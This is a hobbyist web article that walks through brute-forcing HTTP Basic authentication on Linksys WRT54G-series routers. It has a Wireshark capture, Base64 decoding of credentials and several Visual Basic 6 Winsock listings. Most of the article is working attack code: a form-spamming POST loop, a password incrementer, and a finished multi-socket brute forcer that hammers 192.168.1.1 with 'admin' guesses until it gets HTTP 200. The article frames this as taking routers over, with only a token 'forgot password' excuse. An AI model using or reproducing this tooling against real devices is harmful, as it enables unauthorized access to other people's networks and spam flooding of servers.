.: Links :.

Home | Forums | Desert Computer Agents

.: Brute Forcing AAA Authencation :.
By Nicholas A. Hall


	The general idea of a brute forcer, Most of the time.. is to guess the password to authenticate with a system 
that dose not do a check on invalid request. For example, Myspace log in says you may only log in 5 times before they 
disable your email for 24 hours. But a lot of systems such as Linksys Routers don't have that sort of protection 
integrated with them so brute forcing is a method to take the unit over by making thousands of connections at once 
and having each connection guess its own combination of user names and passwords! With the example below this is a 
Visual Basic 6 example of sending post commands witch is about 80% of the chance when submitting a Form / AAA 
authentication to gain Root/Admin to a Device such as a Linksys/Belkin Router. Just by changing the code a little bit 
you can have this submit a combination of authentication methods to spoof Login credentials and gain access within 
minutes depending on the password.

[code]
Dim I As Integer
Private Sub Form_Load()
Winsock2.LocalPort = 88
Winsock2.Listen
I = 99
Start
End Sub

Private Sub Start()
I = I + 1
If I < 1000 Then
    Winsock1.Close
    Winsock1.Connect "192.168.2.6", 80
End If
End Sub

Private Sub Winsock1_Connect()
Winsock1.SendData "POST http://192.168.2.6/signup.php HTTP/1.0" & vbCrLf
Winsock1.SendData "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, _
application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, _
application/vnd.ms-xpsdocument, application/xaml+xml, */*"
Winsock1.SendData "Referer: http://192.168.2.6/signup.php" & vbCrLf
Winsock1.SendData "Content-Type: application/x-www-form-urlencoded" & vbCrLf
Winsock1.SendData "Connection: keep-alive" & vbCrLf
Winsock1.SendData "Host: 192.168.2.6" & vbCrLf
Winsock1.SendData "Proxy-Connection: Keep-Alive" & vbCrLf
Winsock1.SendData "Content-Length: 36" & vbCrLf
Winsock1.SendData "Pragma: no-cache" & vbCrLf
Winsock1.SendData "Cookie: PHPSESSID=ffqnvvpef9pjb3lqms9r21quk5" & vbCrLf

Winsock1.SendData vbCrLf
Winsock1.SendData "name=youve&user=been" & I & "&pass=spammed"
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
'Winsock1.GetData Data, vbString
'Debug.Print Data
Debug.Print I
End Sub

Private Sub Winsock1_SendComplete()
DoEvents
Call Start
End Sub

Private Sub Winsock2_ConnectionRequest(ByVal requestID As Long)
Winsock2.Close
Winsock2.Accept requestID
End Sub

Private Sub Winsock2_DataArrival(ByVal bytesTotal As Long)
Winsock2.GetData Data, vbString
MsgBox Data
End Sub
[/code]


Now reading that Brute forcing can be changed slightly to spam out servers with request / Submitting bogus information.
The big thing we are going to look into is AAA Authentication, A huge thing with wireless networks such as the WRT54G.
That also applies to the GS Series up to WRT350 which is in about 70% of businesses and homes, a lot of the time they are
open and unencrypted and sometimes not so much. But for legitimate reasons if you forgot the password and don't have a
paper clip in handy you can try brute forcing the Unit to recover the password =). The first thing we are going to do is 
try to browse to the Administration page and see what kind of Authentication we are up agence. we see as soon as we go to
the routers default page http://192.168.1.1/ we are greeted with a Box that wont even let us click out to view source.
That right their tells use they are using whats called AAA Basic Authentication. A simple method that has the browser submit
the credentials as part of the GET/POST request to show the router we are a Unrestricted user. Once we put in junk to see 
if it will let us in it will prompt us with the same thing over and over until a Unauthorized User is displayed saying
basically to get out.

NOW, where do we go from here? The Authentication is basically flawless from the average joe to get around without going to
collage for 6 years and learning all about security except for one main fact that it dose not set a time interval between
log in attempts all in all making it possible for a computer to go and guess the password for us while we kick back and 
drink coffee/Monster =). now opening up Wireshark i see what is being sent when i type test for the user name and test
for the password.



Wireshark feeds us something like this

0000  00 1a 70 5c bb dc 00 18  39 08 ca 8e 08 00 45 00   ..p\.... 9.....E.
0010  01 bc 40 5c 40 00 80 06  35 25 c0 a8 01 69 c0 a8   ..@\@... 5%...i..
0020  01 01 c4 0d 00 50 cf be  94 01 f8 7a 6d be 50 18   .....P.. ...zm.P.
0030  11 1c fe 0d 00 00 47 45  54 20 2f 20 48 54 54 50   ......GE T / HTTP
0040  2f 31 2e 31 0d 0a 48 6f  73 74 3a 20 31 39 32 2e   /1.1..Ho st: 192.
0050  31 36 38 2e 31 2e 31 0d  0a 55 73 65 72 2d 41 67   168.1.1. .User-Ag
0060  65 6e 74 3a 20 4d 6f 7a  69 6c 6c 61 2f 35 2e 30   ent: Moz illa/5.0
0070  20 28 57 69 6e 64 6f 77  73 3b 20 55 3b 20 57 69    (Window s; U; Wi
0080  6e 64 6f 77 73 20 4e 54  20 36 2e 30 3b 20 65 6e   ndows NT  6.0; en
0090  2d 55 53 3b 20 72 76 3a  31 2e 39 2e 30 2e 31 30   -US; rv: 1.9.0.10
00a0  29 20 47 65 63 6b 6f 2f  32 30 30 39 30 34 32 33   ) Gecko/ 20090423
00b0  31 36 20 46 69 72 65 66  6f 78 2f 33 2e 30 2e 31   16 Firef ox/3.0.1
00c0  30 0d 0a 41 63 63 65 70  74 3a 20 74 65 78 74 2f   0..Accep t: text/
00d0  68 74 6d 6c 2c 61 70 70  6c 69 63 61 74 69 6f 6e   html,app lication
00e0  2f 78 68 74 6d 6c 2b 78  6d 6c 2c 61 70 70 6c 69   /xhtml+x ml,appli
00f0  63 61 74 69 6f 6e 2f 78  6d 6c 3b 71 3d 30 2e 39   cation/x ml;q=0.9
0100  2c 2a 2f 2a 3b 71 3d 30  2e 38 0d 0a 41 63 63 65   ,*/*;q=0 .8..Acce
0110  70 74 2d 4c 61 6e 67 75  61 67 65 3a 20 65 6e 2d   pt-Langu age: en-
0120  75 73 2c 65 6e 3b 71 3d  30 2e 35 0d 0a 41 63 63   us,en;q= 0.5..Acc
0130  65 70 74 2d 45 6e 63 6f  64 69 6e 67 3a 20 67 7a   ept-Enco ding: gz
0140  69 70 2c 64 65 66 6c 61  74 65 0d 0a 41 63 63 65   ip,defla te..Acce
0150  70 74 2d 43 68 61 72 73  65 74 3a 20 49 53 4f 2d   pt-Chars et: ISO-
0160  38 38 35 39 2d 31 2c 75  74 66 2d 38 3b 71 3d 30   8859-1,u tf-8;q=0
0170  2e 37 2c 2a 3b 71 3d 30  2e 37 0d 0a 4b 65 65 70   .7,*;q=0 .7..Keep
0180  2d 41 6c 69 76 65 3a 20  33 30 30 0d 0a 43 6f 6e   -Alive:  300..Con
0190  6e 65 63 74 69 6f 6e 3a  20 6b 65 65 70 2d 61 6c   nection:  keep-al
01a0  69 76 65 0d 0a 41 75 74  68 6f 72 69 7a 61 74 69   ive..Aut horizati
01b0  6f 6e 3a 20 42 61 73 69  63 20 64 47 56 7a 64 44   on: Basi c dGVzdD
01c0  70 30 5a 58 4e 30 0d 0a  0d 0a                     p0ZXN0.. ..      


What is important is parsing the information so its readable and 0d 0a Hex 
are just CRLF next lines. after clearing it up we get this.

GET / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT  6.0; en-US; rv: 1.9.0.10) Gecko/2009042316 Firefox/3.0.10..Accept: 
text/html,application/xhtml+xml,application/x ml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q= 0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,u tf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Authorization: Basic dGVzdDp0ZXN0


Now the only thing out of the normal on a GET / POST with firefox is this new line its sending called "Authorization"
Doing a Quick Wiki on it should tell you more then I can but to point out the facts what is after is the type
which WRT family uses "Basic" which uses a method of a string concated USER a Collen ":" and the Password.

Opening up Cain and Able and launching the BASE64 decoder and pasting Encrypted form of the Credentals you get(dGVzdDp0ZXN0)



[VB6]
Dim I As Integer
Private Sub Form_Load()
I = 0
Start
End Sub

Private Sub Start()
I = I + 1
If I < 1000 Then
    Winsock1.Connect "192.168.1.1", 80
End If
End Sub

Private Sub Winsock1_Connect()
Debug.Print "Sending Authenication!"
Winsock1.SendData "GET / HTTP/1.0" & vbCrLf
Winsock1.SendData "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, _
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*"
Winsock1.SendData "Content-Type: application/x-www-form-urlencoded" & vbCrLf
Winsock1.SendData "Connection: keep-alive" & vbCrLf
Winsock1.SendData "Host: 192.168.1.1" & vbCrLf
Winsock1.SendData "Authorization: Basic dGVzdDp0ZXN0" & vbCrLf

Winsock1.SendData vbCrLf
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Winsock1.GetData Data, vbString
Debug.Print Data

End Sub
[/VB6]

Response:
Sending Authenication!
HTTP/1.0 401 Unauthorized Access Denied

Server: Intoto Http Server v1.0
WWW-Authenticate: Basic realm="WRT54GS" 
Content-type: text/html
Pragma: no-cache 
Connection: Close 

401 Unauthorized

401 Unauthorized

Authorization required. Now we got a response, A negative one in fact but a response none the less. Now all that data is perfectly set and their are no check sums to write for AAA which makes creating a Brute Forcer simple. The only part we of the string we have to change is the part after "Authorization: Basic" then appended our half what Encrypted string then append CRLF twice to end the HTTP get. So now we have to generate a function that loops until the password is found from the host. After some messing around I ran across a issue where the router would be exhausted from so many connections over and over and would start denying them, So I wrapped by function in a timer control and slowed it down to only 5 connections p/s. Which is not bad at all, I mean its not any 650,000 per second like a MD5 Brute Forcer, But still I mean this can easily run in the background of the system until it gets the passwords, Days, Months. [VB6] Dim MyString As String Dim MyAppenedString As String Const Range As String = "z" 'z Private Sub Timer1_Timer() Debug.Print Text1.Text If (Left(Text1.Text, 1)) = Range Then Dim MyString As String MyString = Text1.Text For i = 1 To Len(Text1.Text) If Mid(MyString, i, 1) = Range Then If i = Len(Text1.Text) Then 'IF Last Number 'Text1.Text = Left(Text1.Text, Len(Text1.Text) - 1) & Chr(48) & Chr(48) 'If last place value is a 9 Text1.Text = Left(MyString, Len(Text1.Text) - 1) & Chr(48) & Chr(48) 'If last place value is a 9 Else Mid(MyString, i, 1) = Chr(48) ' "0" End If Else Mid(MyString, i, 1) = Chr(Asc(Mid(MyString, i, 1)) + 1) Text1.Text = MyString Exit For End If Next Else 'Else Just Increment The Left Most Value Text1.Text = Chr(Asc(Left(Text1.Text, 1)) + 1) & Right(Text1.Text, Len(Text1.Text) - 1) End If End Sub [/VB6] then we must encrypted the generated password with the username in the following format in Base64 Username : Password <--- No spaces (I.E. admin:mypassword) [VB6] Private Function EncodeBase64(ByRef arrData() As Byte) As String Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement ' help from MSXML Set objXML = New MSXML2.DOMDocument ' byte array to base64 Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.nodeTypedValue = arrData EncodeBase64 = objNode.Text ' thanks, bye Set objNode = Nothing Set objXML = Nothing End Function Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement ' help from MSXML Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue ' thanks, bye Set objNode = Nothing Set objXML = Nothing End Function [/VB6] Now with those combine it should be enough to do everything we need! Oh ya, and we need to await a response to see if the attempt was succesfull or not. [VB6] Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Winsock1.GetData Data, vbString Debug.Print Data Debug.Print InStr(1, Data, "401 Unauthorized", vbBinaryCompare) If Left$(Data, 12) = "HTTP/1.0 200" Then Form1.Caption = "Password Found! - " & Text1.Text Else Winsock1_Close End If End Sub [/VB6] Now thats peachy and everything but what if, the router can handle our request pefectly fine, Just dont Inc the attepted password enless connection is succesfull. After all that, In the end we get this. [VB6] VERSION 5.00 Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" Begin VB.Form Form1 Caption = "0" ClientHeight = 840 ClientLeft = 120 ClientTop = 420 ClientWidth = 4275 LinkTopic = "Form1" ScaleHeight = 840 ScaleWidth = 4275 StartUpPosition = 3 'Windows Default Begin MSWinsockLib.Winsock Winsock3 Left = 840 Top = 480 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End Begin MSWinsockLib.Winsock Winsock2 Left = 480 Top = 480 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End Begin VB.CommandButton Command1 Caption = "GO" Height = 375 Left = 3480 TabIndex = 1 Top = 120 Width = 615 End Begin MSWinsockLib.Winsock Winsock1 Left = 120 Top = 480 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End Begin VB.TextBox Text1 Height = 375 Left = 120 TabIndex = 0 Text = "0" Top = 120 Width = 3135 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False 'add a project reference to Microsoft XML, v2.6 (or later) Dim MyString As String Dim MyAppenedString As String Const Range As String = "z" 'z Dim I As Integer Private Sub Command1_Click() MyString = Text1.Text Winsock1.Connect "192.168.1.1", 80 'Winsock2.Connect "192.168.1.1", 80 'Winsock3.Connect "192.168.1.1", 80 End Sub Private Sub Winsock1_Close() 'Debug.Print "Socket Closing" Winsock1.Close 'Debug.Print "Socket Closed" If Text1.Text = "admin" Then Exit Sub Winsock1.Connect "192.168.1.1", 80 'Debug.Print "Socket Connecting" End Sub Private Sub Winsock1_Connect() 'Debug.Print "Socket Connected" I = 0 'Debug.Print Text1.Text If (Left(MyString, 1)) = Range Then For I = 1 To Len(MyString) If Mid(MyString, I, 1) = Range Then 'If It hits the Last Possable Value If I = Len(MyString) Then 'IF Last Number MyString = Left(MyString, Len(MyString) - 1) & Chr(48) & Chr(48) 'If last place value is a 9 Else Mid(MyString, I, 1) = Chr(48) ' "0" End If Text1.Text = MyString Else If Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(65) Or Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(58) Then Mid(MyString, I, 1) = Chr(97) Else Mid(MyString, I, 1) = Chr(Asc(Mid(MyString, I, 1)) + 1) End If Text1.Text = MyString Exit For End If Next Else 'Else Just Increment The Left Most Value 'Makes Checks here for Surpassed value If Chr(Asc(Left(MyString, 1)) + 1) = Chr(65) Or Chr(Asc(Left(MyString, 1)) + 1) = Chr(58) Then MyString = Chr(97) & Right(MyString, Len(MyString) - 1) Else MyString = Chr(Asc(Left(MyString, 1)) + 1) & Right(MyString, Len(MyString) - 1) End If Text1.Text = MyString End If Debug.Print "Sending Authenication! - " & EncodeBase64(StrConv("admin:" & Text1.Text, vbFromUnicode)) Winsock1.SendData "GET / HTTP/1.0" & vbCrLf Winsock1.SendData "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, _ application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*" Winsock1.SendData "Content-Type: application/x-www-form-urlencoded" & vbCrLf Winsock1.SendData "Connection: keep-alive" & vbCrLf Winsock1.SendData "Host: 192.168.1.1" & vbCrLf Winsock1.SendData "Authorization: Basic " & EncodeBase64(StrConv("admin:" & MyString, vbFromUnicode)) & vbCrLf Winsock1.SendData vbCrLf End Sub Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Winsock1.GetData Data, vbString 'Debug.Print "401 Unauthorized" Debug.Print Data Debug.Print InStr(1, Data, "401 Unauthorized", vbBinaryCompare) 'If InStr(1, Data, "401 Unauthorized", vbBinaryCompare) = 0 Then If Left$(Data, 12) = "HTTP/1.0 200" Then Form1.Caption = "Password Found! - " & Text1.Text Else Winsock1_Close End If End Sub Private Function EncodeBase64(ByRef arrData() As Byte) As String Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement ' help from MSXML Set objXML = New MSXML2.DOMDocument ' byte array to base64 Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.nodeTypedValue = arrData EncodeBase64 = objNode.Text ' thanks, bye Set objNode = Nothing Set objXML = Nothing End Function Private Function DecodeBase64(ByVal strData As String) As Byte() Dim objXML As MSXML2.DOMDocument Dim objNode As MSXML2.IXMLDOMElement ' help from MSXML Set objXML = New MSXML2.DOMDocument Set objNode = objXML.createElement("b64") objNode.dataType = "bin.base64" objNode.Text = strData DecodeBase64 = objNode.nodeTypedValue ' thanks, bye Set objNode = Nothing Set objXML = Nothing End Function Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, _ ByVal HelpContext As Long, CancelDisplay As Boolean) 'Debug.Print "Winsock Error: " & Number & "-" & Description Form1.Caption = Form1.Caption + 1 Winsock1_Close End Sub Private Sub Winsock2_Connect() 'Debug.Print "Socket Connected" I = 0 'Debug.Print Text1.Text If (Left(MyString, 1)) = Range Then For I = 1 To Len(MyString) If Mid(MyString, I, 1) = Range Then 'If It hits the Last Possable Value If I = Len(MyString) Then 'IF Last Number MyString = Left(MyString, Len(MyString) - 1) & Chr(48) & Chr(48) 'If last place value is a 9 Else Mid(MyString, I, 1) = Chr(48) ' "0" End If Text1.Text = MyString Else If Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(65) Or Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(58) Then Mid(MyString, I, 1) = Chr(97) Else Mid(MyString, I, 1) = Chr(Asc(Mid(MyString, I, 1)) + 1) End If 'Text1.Text = MyString Exit For End If Next Else 'Else Just Increment The Left Most Value 'Makes Checks here for Surpassed value If Chr(Asc(Left(MyString, 1)) + 1) = Chr(65) Or Chr(Asc(Left(MyString, 1)) + 1) = Chr(58) Then MyString = Chr(97) & Right(MyString, Len(MyString) - 1) Else MyString = Chr(Asc(Left(MyString, 1)) + 1) & Right(MyString, Len(MyString) - 1) End If 'Text1.Text = MyString End If 'Debug.Print "Sending Authenication! - " & EncodeBase64(StrConv("Admin:" & Text1.Text, vbFromUnicode)) Winsock2.SendData "GET / HTTP/1.0" & vbCrLf Winsock2.SendData "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, _ application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*" Winsock2.SendData "Content-Type: application/x-www-form-urlencoded" & vbCrLf Winsock2.SendData "Connection: keep-alive" & vbCrLf Winsock2.SendData "Host: 192.168.1.1" & vbCrLf Winsock2.SendData "Authorization: Basic " & EncodeBase64(StrConv("Admin:" & MyString, vbFromUnicode)) & vbCrLf Winsock2.SendData vbCrLf End Sub Private Sub Winsock2_DataArrival(ByVal bytesTotal As Long) Winsock2.GetData Data, vbString If InStr(1, Data, "401 Unauthorized", vbBinaryCompare) = 0 Then Form1.Caption = "Password Found! - " & Text1.Text Else Winsock2_Connect End If End Sub Private Sub Winsock2_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, _ ByVal HelpContext As Long, CancelDisplay As Boolean) Form1.Caption = Form1.Caption + 1 Winsock2_Close End Sub Private Sub Winsock2_Close() Winsock2.Close Winsock2.Connect "192.168.1.1", 80 End Sub Private Sub Winsock3_Connect() 'Debug.Print "Socket Connected" I = 0 'Debug.Print Text1.Text If (Left(MyString, 1)) = Range Then For I = 1 To Len(MyString) If Mid(MyString, I, 1) = Range Then 'If It hits the Last Possable Value If I = Len(MyString) Then 'IF Last Number MyString = Left(MyString, Len(MyString) - 1) & Chr(48) & Chr(48) 'If last place value is a 9 Else Mid(MyString, I, 1) = Chr(48) ' "0" End If Text1.Text = MyString Else If Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(65) Or Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(58) Then Mid(MyString, I, 1) = Chr(97) Else Mid(MyString, I, 1) = Chr(Asc(Mid(MyString, I, 1)) + 1) End If 'Text1.Text = MyString Exit For End If Next Else 'Else Just Increment The Left Most Value 'Makes Checks here for Surpassed value If Chr(Asc(Left(MyString, 1)) + 1) = Chr(65) Or Chr(Asc(Left(MyString, 1)) + 1) = Chr(58) Then MyString = Chr(97) & Right(MyString, Len(MyString) - 1) Else MyString = Chr(Asc(Left(MyString, 1)) + 1) & Right(MyString, Len(MyString) - 1) End If 'Text1.Text = MyString End If 'Debug.Print "Sending Authenication! - " & EncodeBase64(StrConv("Admin:" & Text1.Text, vbFromUnicode)) Winsock3.SendData "GET / HTTP/1.0" & vbCrLf Winsock3.SendData "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, _ application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*" Winsock3.SendData "Content-Type: application/x-www-form-urlencoded" & vbCrLf Winsock3.SendData "Connection: keep-alive" & vbCrLf Winsock3.SendData "Host: 192.168.1.1" & vbCrLf Winsock3.SendData "Authorization: Basic " & EncodeBase64(StrConv("Admin:" & MyString, vbFromUnicode)) & vbCrLf Winsock3.SendData vbCrLf End Sub Private Sub Winsock3_DataArrival(ByVal bytesTotal As Long) Winsock3.GetData Data, vbString If InStr(1, Data, "401 Unauthorized", vbBinaryCompare) = 0 Then Form1.Caption = "Password Found! - " & Text1.Text Else Winsock3_Connect End If End Sub Private Sub Winsock3_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, _ ByVal HelpContext As Long, CancelDisplay As Boolean) Form1.Caption = Form1.Caption + 1 Winsock3_Close End Sub Private Sub Winsock3_Close() Winsock3.Close Winsock3.Connect "192.168.1.1", 80 End Sub [/VB6] This article is nowhere near complete, and needs a lot of revising, If you think you got any suggestions at all, PLEASE DROP AN EMAIL!

.: Links :.

Home | Forums | Desert Computer Agents